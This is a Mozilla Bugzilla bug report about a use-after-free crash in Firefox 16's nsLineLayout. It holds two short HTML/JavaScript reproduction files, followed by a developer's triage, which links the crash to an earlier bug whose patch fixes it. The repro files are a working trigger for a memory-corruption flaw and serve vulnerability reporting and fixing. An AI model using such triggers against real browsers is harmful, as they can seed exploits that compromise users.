Closed
Bug 802991
Opened 12 years ago
Closed 12 years ago
Use-after-free in nsLineLayout
Categories
(Core :: Layout, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 765409
People
(Reporter: abbGZcvu_bugzilla.mozilla.org, Unassigned)
Details
(Keywords: crash)
Attachments
(1 file)
551 bytes,
application/octet-stream
|
Details |
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Steps to reproduce:
The below files trigger a use-after-free in Firefox 16.0.1, causing it to crash when tries to accesses data through a poisoned frame. frame.html can trigger the issue by itself, and repro.html is not required but does make it easier to trigger the access violation.
--- repro.html ---
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<iframe src="frame.html"></iframe>
</body>
</html>
--- frame.html ---
<!DOCTYPE html>
<fieldset><x dir="rtl">
<script id="y" type="text/javascript">
var oScriptElement = document.getElementById("y");
oScriptElement.parentNode.removeChild(oScriptElement);
var oHtml = '<x>' +
'<x id="x"></x>' +
' ' +
'<img alt="AAAAAAAAAAAAAAAAAAAAAA c">' +
'<x>' +
' ' +
'<x dir="ltr">';
document.write(oHtml);
document.documentElement.offsetTop;
var oElement = document.getElementById("x");
oElement.textContent = 'x';
</script>
Actual results:
Attempt to read from unallocated arbitrary memory (@0xF0DE8133) in xul.dll!nsLineLayout::ReflowFrame
Expected results:
No crash
Updated•12 years ago
|
Component: Untriaged → Layout
Product: Firefox → Core
Comment 1•12 years ago
|
||
I can reproduce the crash in mozilla-beta and -release debug builds on Linux64,
but not -aurora or trunk. Before the crash I got these assertions:
###!!! ASSERTION: unexpected flow: 'mFrames.ContainsFrame(nextInFlow)', file layout/generic/nsInlineFrame.cpp, line 500
###!!! ASSERTION: StealFrame: can't find aChild: 'removed', file layout/generic/nsContainerFrame.cpp, line 1210
###!!! ASSERTION: StealFrame failure: 'NS_SUCCEEDED(rv)', file layout/generic/nsContainerFrame.cpp, line 1339
which points to bug 765409. After applying the patch there, the crash
and assertions are gone. (The fix will land on -beta (Fx17) soon)
Severity: normal → critical
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Keywords: crash
Resolution: --- → DUPLICATE
Updated•10 years ago
|
Group: core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•